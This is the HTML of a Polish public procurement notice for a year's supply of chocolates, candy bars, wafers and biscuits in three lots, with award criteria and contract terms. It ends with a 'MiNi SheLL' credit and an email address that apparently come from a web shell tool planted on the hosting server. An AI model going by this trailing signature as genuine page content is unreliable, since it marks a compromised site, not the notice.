              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. a) W przypadku wykonawcy wspólnie ubiegających się o zamówienie (np. konsorcjum, spółka cywilna) ww. dokument składają wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia przez zamawiającego na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp przekazuje zamawiającemu, zgodnie z art. 24 ust. 11 ustawy Pzp, w formie oryginału oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której jest mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wzór oświadczenia stanowi załącznik nr 3 do siwz</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>60 % cena</td><td></td></tr><tr><td>40 % termin realiz.rekla. </td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: 
Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności: 1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i/lub pkt 2; 2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1; 3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy; 4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego; 5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego; 6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3; 7) dopisania do § 5 pkt 1 ppkt 1 magazynu zlokalizowanego w OZ w Chełmnie, ul. 22 stycznia 3a.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 04/05/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Grupa 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Czekolada mleczna nadziewana różne smaki 100 g, ilość szacunkowa 15000 sztuk. CPV: 15842100-3.
2) Czekolada mleczna 100 g, ilość szacunkowa 15000 sztuk. CPV: 15842100-3.
3) Czekolada gorzka 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
4) Czekolada mleczna bakaliowa z rodzynkami i orzechami 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
5) Czekolada gorzka E.Wedel 100 g, ilość szacunkowa 7000 sztuk. CPV: 15842100-3.
6) Czekolada mleczna nadziewana E.Wedel 100 g, różne smaki, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
7) Czekolada mleczna E.Wedel 100 g, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
8) Czekolada mleczna z całymi orzechami laskowymi Alpen Gold NusseBeiser 100 g, ilość szacunkowa 8000 sztuk. CPV: 15842100-3
9) Czekolada mleczna z orzechami laskowymi Alpen Gold 90 g, ilość szacunkowa 6000 sztuk. CPV: 15842100-3.
10) Czekolada biała bourbon-wanilia Alpen Gold 90 g, ilość szacunkowa 6000 sztuk. CPV: 15842100-3.
11) Czekolada mleczna z orzechami laskowymi E.Wedel 100 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
12) Czekolada mleczna z rodzynkami i orzechami laskowymi  milka (Raisin&amp;Nut) 100 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15842100-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>60 % cena</td><td></td></tr><tr><td>40%termin realizacji reklamacji</td><td></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Grupa 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Baton Mars 47 g. Nugatowe nadzienie, karmel, mleczna czekolada, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
2) Baton Snickers 50 g. Nugatowe nadzienie, prażone orzeszki ziemne, karmel, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
3) Baton Lion 42 g. Nadziewany wafel z karmelem i płatkami ryżowymi w polewie kakaowej, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
4) Baton 3 Bit 41 g. Baton w czekoladzie mlecznej z nadzieniem mlecznym i herbatnikiem, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
5) Baton KitKat 40 g. Paluszek waflowy w mlecznej czekoladzie, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
6) Baton Pawełek różne smaki 45 g. Batonik z nadzieniem w mlecznej czekoladzie, ilość szacunkowa 8000 sztuk. CPV: 15842220-0.
7) Baton Twix 51 g (2x25,00 g). Ciasteczka oblane kremem i mleczną czekoladą, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
8) Baton Kinder Boueno 43 g. Dwa batony w opakowaniu, pojedynczo pakowane. Wafel pokryty mleczną czekoladą, wypełniony mleczno-orzechowym nadzieniem, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
9) Baton Bounty 57 g. Wiórki kokosowe oblane mleczną czekoladą, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
10) Wafelek kakaowy w polewie czekoladowej 30 g, ilość szacunkowa 10000 sztuk. CPV: 15842220-0.
11) Wafelek orzechowy w polewie czekoladowej 30 g, ilość szacunkowa 8000 sztuk. CPV: 15842220-0.
12) Wafelek Grześki 36 g, przekładany kremem kakaowym w czekoladzie, ilość szacunkowa 20000 sztuk. CPV: 15842220-0.
13) Wafle Familijne Jutrzenka różne smaki 180 g, ilość szacunkowa 10000 sztuk. CPV: 15842220-0.
14) Wafelek Princessa różne smaki 35-37 g przekładany kremem oblany mleczną czekoladą, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
15) Wafelek Prince Polo XXL różne smaki 50 g, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
16) Wafle teatralne w czekoladzie Kopernik 46 g, ilość szacunkowa 8000 sztuk. CPV: 15842220-0.
17) Rogal 7 Days Chipita o nadzieniu o różnych smakach 60 g, ilość szacunkowa 7000 sztuk. CPV: 15842220-0.
18) Rolada długoterminowa TAGO 200 g, różne smaki, ilość szacunkowa 4000 sztuk. CPV: 15842300-5.
19) Wafle przekładane kremem 150 g paczkowane , ilość szacunkowa 7000 sztuk. CPV: 15842220-0.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15842220-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>60 % cene</td><td></td></tr><tr><td>40 % termin reaizacji reklamaci</td><td></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Grupa 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Markizy kakaowe Hit Bahlsen 220 g, ilość szacunkowa 5000 sztuk. CPV: 15842300-5.
2) Markizy kakaowe  500 g, ilość szacunkowa 5000 sztuk. CPV: 15842300-5.
3) Chałwa różne smaki  bez polewy 65 g, ilość szacunkowa 1300 sztuk. CPV: 15842300-5.
4) Cukierki Nimm2 90 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
5) Cukierki Werthers orginal 90 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
6) Landrynki-karmelki twarde miętowe 80 g, ilość szacunkowa 13000 sztuk. CPV: 15842300-5.
7) Landrynki-karmelki twarde o smaku owocowym 80 g , ilość szacunkowa 13000 sztuk. CPV: 15842300-5.
8) Krówki paczkowane 130, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
9) Jeżyki Jutrzenka różne smaki 140 g, ilość szacunkowa 3500 sztuk. CPV: 15842300-5.
10) Delicje E.Wedel różne smaki 147 g, ilość szacunkowa 7000 sztuk. CPV: 15842300-5.
11) Pieguski E.Wedel różne smaki 135 g, ilość szacunkowa 3500 sztuk. CPV: 15842300-5.
12) Krakuski florianki 143 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
13) Krakuski serduszka 143 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
14) Krakuski ciastka maślane 150 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
15) Krakuski deserowe z cukrem 150 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
16) Krakuski kokosowe 125 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
17) Biszkopty 120 g, ilość szacunkowa 5000 sztuk. CPV: 15842300-5.
18) Biszkopty z galaretką w polewie czekoladowej różne smaki 130 g, ilość szacunkowa 8000 sztuk. CPV: 15842300-5.
19) Herbatniki Petit Beurry 100 g, ilość szacunkowa 8000 sztuk. CPV: 15821200-1.
20) Paluszki solone 70 g  80 g, ilość szacunkowa 20000 sztuk. CPV: 15842300-5.
21) Sękacz kakaowy 32 g, ilość szacunkowa 12000 sztuk. CPV: 15842300-5.
22) Ptasie mleczko waniliowe w polewie czekoladowej E.Wedel 380 g, ilość szacunkowa 1800 sztuk. CPV: 15842300-5.
23) Ptasie mleczko waniliowe w polewie czekoladowej 500 g, ilość szacunkowa 3000 sztuk. CPV: 15842300-5.
24) Pierniki w czekoladzie 400 g , ilość szacunkowa 1500 sztuk. CPV: 15842300-5.
25) Toffifee bombonierka 125 g. Orzech laskowy w karmelu, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
26) Napój czekoladowy instant  rozpuszczalny 300 g. CPV: 15841000-5, ilość szacunkowa 5000 sztuk.
27) Paluszki serowo-cebulowe 220 g  250 g, ilość szacunkowa 2000 sztuk, CPV:15842300-5.
28) Lizaki serduszka,6 g /100 szt / ilość szacunkowa 500 opakowań, CPV 15842300-5.
29) Lizaki Chupa-Chups, ilość szacunkowa 1500 sztuk, CPV 15842300-5.
30) Draże kokosowe, paczkowane opakowanie o wadze 80 g ilość szacunkowa 2000 sztuk, CPV: 15842300-5.
31) Draże kakaowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 2000 sztuk, CPV: 15842300-5.
32) Draże śmietankowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 2000 sztuk, CPV: 15842300-5.
33) Kamyki orzechowe  kruche orzeszki arachidowe oblane kolorowym lukrem, paczkowane opakowanie o wadze 90 g  100 g, ilość szacunkowa 2500 sztuk. CPV: 15842400-6.
34) BOMBONIERKA Ferrero Raffaello  opakowanie o wadze 150 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
35) Rodzynki w czekoladzie o wadze 100 g, ilość szacunkowa 3000 sztuk. CPV: 15332412-5.
36) Drażetki Mentos o wadze 37 g  43 g, różne smaki, ilość szacunkowa 400 sztuk. CPV:15842300-5.
37) Drażetki Tic-Tak o wadze 16 g, różne smaki, ilość szacunkowa 500 sztuk. CPV:15842300-5.
38) Cukierki Raczki o wadze 120 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
39) Krakersy o wadze 170 g , ilość szacunkowa 500 sztuk. CPV: 15842300-5.
40) Rurki TAGO - opakowania luzowe 3 kg, różne smaki, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
41) Ciastka kruche z nadzieniem po środku  Słoneczniki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
42) Jogusie mix PSZCZÓŁKA  opakowanie zbiorcze 3 kg, mieszanka 4 cukierków z nadzieniem mlecznym o smakach: cytrynowym, brzoskwiniowym, malinowym i poziomkowym, ilość szacunkowa 400 sztuk. CPV: 15842300-5.
43) Michałki   opakowanie 2 kg, cukierki orzechowe oblane czekoladą, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15842300-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>60% cena</td><td></td></tr><tr><td>40% termin realizacji reklamacji</td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com